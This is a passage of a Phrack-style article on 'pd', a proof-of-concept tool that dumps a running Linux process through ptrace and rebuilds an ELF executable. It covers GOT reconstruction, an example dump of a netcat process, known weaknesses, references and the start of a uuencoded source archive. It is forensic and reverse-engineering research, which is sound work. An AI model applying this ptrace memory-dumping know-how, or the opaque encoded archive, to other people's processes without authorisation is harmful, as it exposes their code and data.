+ - Code and Data portions (maps) of the memory process.
+ - If exists (has not been deleted) the elf and/or program headers.
+ - Dynamic linking system (if it's being) used by the program.
+ - Also, "state" of the process: stack and registers*
+
+Stack and  registers (state) are useful  when you plan to  launch the same
+process  in another  moment,  or  in another  computer  but recovering  the
+execution point: Froze the program and  re-run in other computer could be a
+real scenario for this example. One  of the funniest results found using pd
+to froze processes was the possibility to save a game and restore the saved
+"state" as a way to add the "save game" feature to the XSoldier game. 
+
+Something interesting is also  another information the process is currently
+handling:  file  descriptors, signals,  and  so.   With  the signals,  file
+descriptors,  memory,  stack  and  registers  we could  "froze"  a  running
+application  and  restore  it's  execution  in  other  host,  or  in  other
+moment.  Due  to  the  design  of  the  process creation, it's possible to 
+recreate in great part the state  of the process  even if  it's interacting
+with  regular files.  In  a more  technical detail,  the re-create  process
+will inherit all the attributes of  the parent, including file descriptors.
+It's our task  if  we would   like  to  restore   a  "frozen state"  dumped
+process to read the position  of the  descriptors and  restore them for the
+"frozen process". 
+
+Please  notice that  any  other  interaction  using  sockets  or pipes  for
+example, require  an state analysis  of the  communicated messages so their
+value, or  streamed content  may be lost.   If you  dump  a program  in the
+middle  of a TCP  connection, TCP  session will  not be  established again,
+neither the  sent data and  acknowledge messages received  from  the remote
+system, so it's  not possible to re-run a process from  a "frozen state" in
+all cases. 
+
+
+----[ 6.3- Order/Clean and safe binary data in a file
+
+    Order/Clean  and  safe  task  is   the  simplest   one.  Get  all   the
+available information and remove the useless, sort  the useful, and save in
+a secure storage.  It  has been separated  from  the  whole  process due to
+limitations in the recovering conditions. If the reconstructed binary could
+be stored in the filesystem then simply keep the  information  saved  in  a
+file, but, it's interesting in some cases to  send the gathered information
+to another host for processing, not writing to  disk, and not modifying the
+filesystem  for  other  type   of  analysis.    This   will   avoid   data 
+contraception  in  a  compromised  system if  that's  the  purpose  of  pd 
+execution. 
+
+ 
+ 
+----[ 6.4- Build an ELF header for that file to be loaded
+
+    If finally we don't find it in memory, the best way  is  to rebuild it.
+Using the ELF documentation  would be easy  enough to  setup a basic header
+with the information  gathered.  It's  also necessary  to create  a program
+headers table if we could not find it in memory. 
+
+Even if the ELF header is  found in memory, a manipulation of the structure
+is needed as we could miss a lot of information not kept in memory, or not
+necessary for the  rebuild process: For example, all  the information about
+file  sections,  debug  information  or  any kind  of  informational  data.
+
+
+----[ 6.5- Adjust binary information
+
+    At this point, all the information has  been  gathered,  and the  basic
+skeleton of the executable should be ready to use. But before finishing the
+reconstruction process some final steps could be performed. 
+
+As some  binary data is  copied from memory  and glued into a  binary, some
+offset and  header information  (as number of  memory maps and  ELF related
+information) need to be adjusted. 
+
+Also, if it's  using some system feature (let's  say, runtime linking) some
+of the gathered information may be referred to this  host  linking  system,
+and need to be rebuilt in order to work in another environments. 
+
+As  the result  of reconstruction  we have  two great  caveats  to resolve:
+
+ - Elf header 
+ - Dynamic linking system
+
+ The  elf header is  only used  in the  load time,  so we  need to  setup a
+ compatible header to load correctly all the information we have got. 
+
+ The dynamic system relies in host library scheme, so we need to regenerate
+ a  new layout  or restore  the previous  one to  a generic  usable dynamic
+ system, it's:  GOT recovering.  PD resolves  this issue in  an elegant and
+ easy way explained later. 
+ 
+
+----[ 6.6 - Resume of process in steps
+
+    Now let's resume  with more granularity the steps  performed until now,
+and what could be   do with all the gathered information.   As  a  generic 
+approach let's resume a "process saving" procedure:
+
+ - Froze the process  (avoid any malicious reaction of the program..).
+ - Stop current execution and attach to it (or inject code.. or..).
+ - Save "state": registers, stack and all information from the system.
+ - Recover file descriptors state and all system data used by the process.
+ - Copy process "base": files needed (opened file descriptors, libraries,
+   ... ).
+ - Copy data from memory: copy code segments, data segments, stack,
+   libraries..
+
+With all this information we can now do two things:
+ 
+    - Rebuild the  single executable: reconstruct a binary  file that could
+    be launched  in any host (with  the same architecture,  of course), or
+    executable  only in  the same  host, but  allowing complete  execution 
+    from the start of the code. 
+ 
+    - Prepare a package allowing to re-execute the process in another host,
+    or in any other moment, that's, a "frozen" application that will resume
+    it's state  once launched.   This will allow  us to save  a suspicious
+    process and relaunch in other host preserving it's state. 
+
+
+If it's  our intention to  recover the state  in other moment, even  if its
+recovery is not  totally guaranteed (internal system workflow  may avoid 
+its correct execution) the loading process will be:
+
+ - Set all files used by the application in the correct location
+ - Open the files  used by the program  and move handlers to  the same
+   position (file handlers will be inherited by child process)
+ - Create a new process.
+ - Set "base" (code and data) in the correct segments of memory.
+ - set stack and registers.
+ - launch execution.
+ 
+
+But for the purpose  of this paper, the final stage is  to rebuild a binary
+file, a single  executable presumed to be reconstructed  from the image of
+the process  being executed  in the  memory. These are  the final  steps we
+could see later, labeled as pd implementation:
+ 
+ - Create an ELF header in a file: if it could not be found.
+ - Attach "base" to the file (code and data memory copies)
+ - Readjust GOT (dynamic linking).
+
+
+----[ 6.7 - pd (process dumper) Proof of concept.
+
+    At the time of writing this paper, a simple process dumper is included 
+for  testing  purposes.  Although it  contains  basic  working code, it's 
+recommended to download  the latest version  of  the   program   from   the
+http://www.reversing.org  web site.  The  version included  here is  a very
+basic stripped version  developed two years ago. This PD is  just a POC for
+testing the process described in this article supporting dynamically linked
+binaries.  This is the description  of the different tasks it will perform:
+
+   - Ptrace attach to a pid: to access memory (mainly read memory) process.
+
+   - Information  gathering: Everytime  a program  is executed,  the system
+ will create  an special  struct in  the memory for  the dynamic  linker to
+ success  bind  functions of  that  process.   That  struct, the  "Auxiliar
+ Vector" holds  some elf  related information of  the original file,  as an
+ offset  to the  program  headers  location in  memory,  number of  program
+ headers  and so  (there  is some  doc  about this  special  struct in  the
+ included source package). 
+
+ With the program headers information recovered, a loop  for  memory  maps 
+ being  saved to  a file  is  started.   Program header  holds  the loaded 
+ program segments.  We'll  care in  the  LOAD  flag  of the  mapped  memory
+ segment in  order to save it. Memory  segments not marked as  LOAD are not
+ loaded from  that file for  execution. This version  of PD does  not use 
+ /proc filesystem at any time. 
+
+ If the  program  can't find the  information, some of  the arguments  from
+ command line may  help to finish the process. For  example, with "-p addr"
+ it's possible  to force  the address of  the program headers  in memory. 
+ This  value for  gcc+ldd built  binaries is  0x8048034.  This argument may
+ be used  when the program outputs  the message "search failed" when trying
+ to locate  PAGESZ. If PAGESZ  is not  in the stack  it indicates  that the
+ "auxiliar vector  array" could not  be located, so program  headers offset
+ would neither  be found (often  when the file  is not launched  from the
+ shell  or  is   loaded  by   other   program  instead   of  the  kernel). 
+	 
+   - File dumping:  If the information is  located the data is  dumped to a
+ file,  including the  elf  header if  it's  found in  memory (rarely  it's
+ deleted  by any  application).   This version  of  pd will NOT create  any
+ header for the file (it's done in the lastest version). 
+
+ This dump should work for the  local host,  as dynamic information  is not
+ being rebuilt.  There's a simple method  to recover  this information with
+ files built with gcc+ldd as shown below. 
+   
+   - GOT rebuilding
+
+   The runtime  linker should had modified  some of the GOT  entries if the
+ functions had  been called during execution.  The way pd  rebuilds the GOT
+ is  based in GCC  compiling method.   Any binary  file is  very compiler
+ dependant (not  only system), and a fast analysis about  how GCC+LDD build
+ the GOT of  the compiled binary, shows the way  to reconstruct  it  called
+ "Aggressive GOT reconstruction".  Another compilers/linkers  may need more
+ in depth  study.  A  txt is  included  in the  source about Aggressive GOT
+ reconstruction. 
+   
+ The option -l tagged as "local  execution only" in the command line will
+ avoid GOT reconstruction. 
+ 
+   In this  version of PD,  PLT/GOT reconstruction is only  functional with
+ GCC  compiled binaries.  To  make that  reconstruction,  the .plt  section
+ should be  located (done by the program usually).  If the location  is not
+ found by the PD, the argument -g addr in the command line  may help.  Even
+ if it has been tested against several files, this so simple implementation
+ may fail  with  files  using hard  dynamic  linking in  the system.
+
+ Once  again I  remember this  is a test  code.  For better results please 
+ download latest version of PD. 
+
+   -- Aggressive reconstruction of GOT --
+   
+   GCC in  the process  of compiling a  source code  makes a table  for the
+ relocation entries  to link with ldd. This table grows as  source file  is
+ being analyzed.  Each  relocatable object  is then pushed  in  a table for
+ internal manipulation. Each  table entry  has a size  of 0x10 bytes,  each
+ entry is located 0x10 bytes from  the last, so there are 16 bytes  between
+ each   object.    Take   a   look    at   this   output    of   readelf. 
+   
+  Relocation section '.rel.plt' at offset 0x308 contains 8 entries:
+  Offset    Info    Type            Sym.Value  Sym. Name
+  080496b8 00000107 R_386_JUMP_SLOT 08048380   getchar
+  080496bc 00000207 R_386_JUMP_SLOT 08048390   __register_frame_info
+  080496c0 00000307 R_386_JUMP_SLOT 080483a0   __deregister_frame_inf
+  080496c4 00000407 R_386_JUMP_SLOT 080483b0   __libc_start_main
+  080496c8 00000507 R_386_JUMP_SLOT 080483c0   printf
+  080496cc 00000607 R_386_JUMP_SLOT 080483d0   fclose
+  080496d0 00000707 R_386_JUMP_SLOT 080483e0   strtoul
+  080496d4 00000807 R_386_JUMP_SLOT 080483f0   fopen
+                                          ^
+                                          ^
+  As shown  below, each of  the entries from  the table is just  0x10 bytes
+  below than  the next  in memory  . When one of this  objects is linked in
+  runtime, it's  value will show a library space memory address out  of the
+  original segment.   Rebuilding this  table is done  locating at  least an
+  unresolved  value from this  list (it's  symbol value must be inside it's
+  program  section memory space). Original address  could then  be obtained
+  from It's position. 
+
+  The  next  step  is  to  perform  a replace  in  all  entries  marked  as
+  R_386_JUMP_SLOT with the calculated address for each modified entry. 
+  Note: Other  compilers may  act very different, so the  first step  is to
+  fingerprint the compiler before doing any un-relocation task. 
+
+  Some options  are manipulable in  command line to pd. See readme for more
+  information.  Also,  some demos are included  in  the src package, and a 
+  simple todo  with help to launch each them: simple process  dump, packed 
+  dump (upx or burneye), injected code dump and grugq's ulexec dump. 
+
+  Here is, for your information a simple dump of a netcat process connected
+  to a host:
+
+---------------------------------------------------------------------------
+[ilo@reversing src]$ ps aux |grep localhost
+ilopez   5114  0.0  0.2  1568  564 pts/2   S+   02:25  0:00 nc localhost 80
+[ilo@reversing src]$ ./pd -vo nc.dumped 5114
+pd V1.0 POF <ilo@reversing.org>
+source distribution for testing purposes..
+[v]Attached.
+performing search..
+only PAGESZ method implemented in this version
+[v]dump: 0xbffff000 to 0xc0000000: 0x1000 bytes
+AT_PAGESZ located at: 0xbffffb24
+[v]Now checking for boundaries..
+[v]Hitting top at: 0xbffffb94
+[v]Hitting bottom at: 0xbffffb1c
+[v]AT_PHDR: 0x8048034  AT_PHNUM: 0x7
+[v]dump: 0x8048034 to 0x8048114: 0xe0 bytes
+[v]program header( 0-7 ) table info..
+[v]TYPE Offset     VirtAddr   PhysAddr   FileSiz MemSiz  FLG   Align
+[v]PHDR 0x00000034 0x08048034 0x08048034 0x000e0 0x000e0 0x005 0x4
+[v]INTE 0x00000114 0x08048114 0x08048114 0x00013 0x00013 0x004 0x1
+[v]LOAD 0x00000000 0x08048000 0x08048000 0x03f10 0x03f10 0x005 0x1000
+[v]LOAD 0x00004000 0x0804c000 0x0804c000 0x005d8 0x005d8 0x006 0x1000
+[v]DYNA 0x00004014 0x0804c014 0x0804c014 0x000c8 0x000c8 0x006 0x4
+[v]NOTE 0x00000128 0x08048128 0x08048128 0x00020 0x00020 0x004 0x4
+..
+gather process information and rebuild:
+-loadable program segments, elf header and minimal size..
+[v]dump: 0x8048000 to 0x804bf10: 0x3f10 bytes
+[v]realloc to 0x3f10 bytes
+[v]dump: 0x804c000 to 0x804c5d8: 0x5d8 bytes
+[v]realloc to 0x45d8 bytes
+[v]max file size 0x45d8 bytes
+[v]dumped .text section
+[v]dumped .data section
+[v]segment section based completed
+analyzing dynamic segment..
+[v]HASH
+[v]STRTAB
+[v]SYMTAB
+[v]symtable located at: 0x80482d8 , offset: 0x2d8
+[v]st_name 0x208 st_value 0x0 st_size 0x167
+[v]st_info 0x12 st_other 0x0 st_shndx 0x0
+[v]STRSZ
+[v]SYMENT
+Agressive fixing Global Object Table..
+ vaddr: 0x804c0e0 daddr: 0x8048000 foffset: 0x40e0
+* plt unresolved!!!
+section headers rebuild
+this distribution does not rebuild section headers
+saving file: nc.dumped
+[v]saved: 0x45d8 bytes
+Finished.
+[v]Dettached.
+---------------------------------------------------------------------------
+
+In this  example the  program netcat with  pid 5114  is dumped to  the file
+nc.dumped. The  reconstructed binary is only  part of the  original file as
+show in these lists:
+
+---------------------------------------------------------------------------
+[ilo@reversing src]$ ls -la nc.dumped
+-rwxr-xr-x  1 ilo ilo 17880 Jul 10 02:26 nc.dumped
+[ilo@reserving src]$ ls -la `whereis nc`
+ls: nc:: No such file or directory
+-rwxr-xr-x  1 root root 20632 Sep 21  2004 /usr/bin/nc
+---------------------------------------------------------------------------
+
+This version of  pd does all the  tasks of rebuilding a binary  file from a
+process. The pd concept was  re-developed to a more useful tool performing
+two  steps. The first  should help  recovering all  the information  from a
+process in a single package. With all this information a second stage allow
+to rebuild  the executable  in more relaxed  environment, as other  host or
+another moment. The option to save  and restore state of a process has been
+added thus  allowing to re-lauch an  application in other host  in the same
+state as it was when the  information was gathered. Go to reversing.org web
+site to get the last version of the program. 
+
+
+
+--[ 7.0 - Defeating PD, or defeating process dumping.
+
+    The  process   presented   in  this  article  suffers   from  lots  of 
+presumptions: tested  with gcc compiled  binaries, under  specified  system
+models,  its workflow simply  depends  on  several  system  conditions and 
+information that could be forged by the program.   However  following  the
+method would be easy to defeat further antidump research. 
+
+In each recovering  process task, some of the  information is presumed, and
+other is obtained  but never evaluated before. Although  the process may be
+reviewed for  error and  consistency checking a  generic flow will not work
+against  an specific  developed program.   For example,  it's very  easy to
+remove  all  data information  from  memory to  avoid  pd  reading all  the
+needings in the rebuild process. Elf header could be deleted in runtime, or
+modified, as the auxiliar vector in the stack, or the program headers. 
+
+There are  other methods to get  the binary information:  asking the kernel
+about  a  process or  accessing  in raw  format  to  memory locating  known
+structures and so,  but not only it's a very hard  approach, the system may
+be forged by an intruder. Never forget that.. 
+
+Current issues known in PD are:
+
+ - If the program is being ptraced, this condition will prevent pd
+ attaching process to work, so program ends here (for now).
+ 
+   Solution: enable a kernel process to dump binary information even if
+   ptrace is disabled.
+ 
+ - If a forged ELF header is found in the system, probably it will be used
+ instead of the real one.
+ 
+   Solution: manually inspect ELF header or program headers found in the
+   system before accepting them.
+ 
+ - If no information about program headers or elf is found, and if /proc is
+ not available in that user space, and aux_vt is not found the program will
+ not work, and..
+ 
+   Solution: perform a better approach in pd.c.  PD is just a POC code to
+   show the process of rebuild a binary file.  In a real
+   
+ - Some kernel patches remove memory contents and modify binary file prior
+ to execution: Unspected behavior.
+
+
+Anyway, PD  will not  work well  with programs where  the data  segment has
+variables  modified  in runtime,  as  execution  of  the recovered  program
+depends in  the state of these  variables. There's no  history about memory
+modified by a process, so return to a previous state of the data segment is
+impossible, again, for now. 
+
+
+--[ 8.0 - Conclusion
+
+    "Reversing" term reveals a funny feature:  every time a  new  technique
+appears, another one defeat it,  in both sides.  As in the virus  scene, a
+new patch will  follow to  a new  development. Everytime  a new  forensics
+method is released, a  new anti-forensics  one appears.   There's  a  crack
+for almost every protected application, and a new version of  that  program
+will protect from that crack. 
+
+In  this  paper,  some of  the  methods  hiding  code  (even if  it's  not
+malicious)  were defeated  with simply  reversing how  a process  is built.
+Further investigation may leave this  method inefficient due to load design
+of the kernel in the studied system.  In fact, once a method is known, it's
+easy to defeat, and the one  presented in this article is not an exception 
+
+
+--[ 9.0 - Greets & contact
+
+Metalslug,  Uri, Laura,  Mammon (still  more  ptrace stuff.. you know  ;)),
+Mayhem, Silvio, Zalewski, grugq, !dSR and 514-77, "ncn" and "fist" staff.
+Ripe deserves  special thanks  for help  in demo codes,  and pushing  me to
+improve the recovering process. 
+
+Contact:   ilo[at]reversing.org  http://www.reversing.org
+
+
+--[ 10 - References
+- grugq 2002 - The Art of Defiling: Defeating Forensic Analysis on Unix
+  http://www.phrack.org/phrack/59/p59-0x06.txt
+- grugq 2004 - The Design and Implementation of ul_exec 
+  http://www.hcunix.net/papers/grugq_ul_exec.txt
+- 7a69 - Ghost In The System Project
+  http://www.7a69ezine.org/gits
+- Silvio - Elf executable reconstruction from a core image
+  http://www.uebi.net/silvio/core-reconstruction.txt
+- Mayhem - Some shoots related to linux reversing.
+  http://www.devhell.org/
+- ilo-- - Process dumping for binary reconstruction: pd 
+  http://www.reversing.org/
+ 
+ 
+  
+--[ 11 - Source Code
+  This is  not the  last version  of PD.   For further  information about
+  this project please refer to http://www.reversing.org
+  
+begin 664 pd-1.0.tar.gz
+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
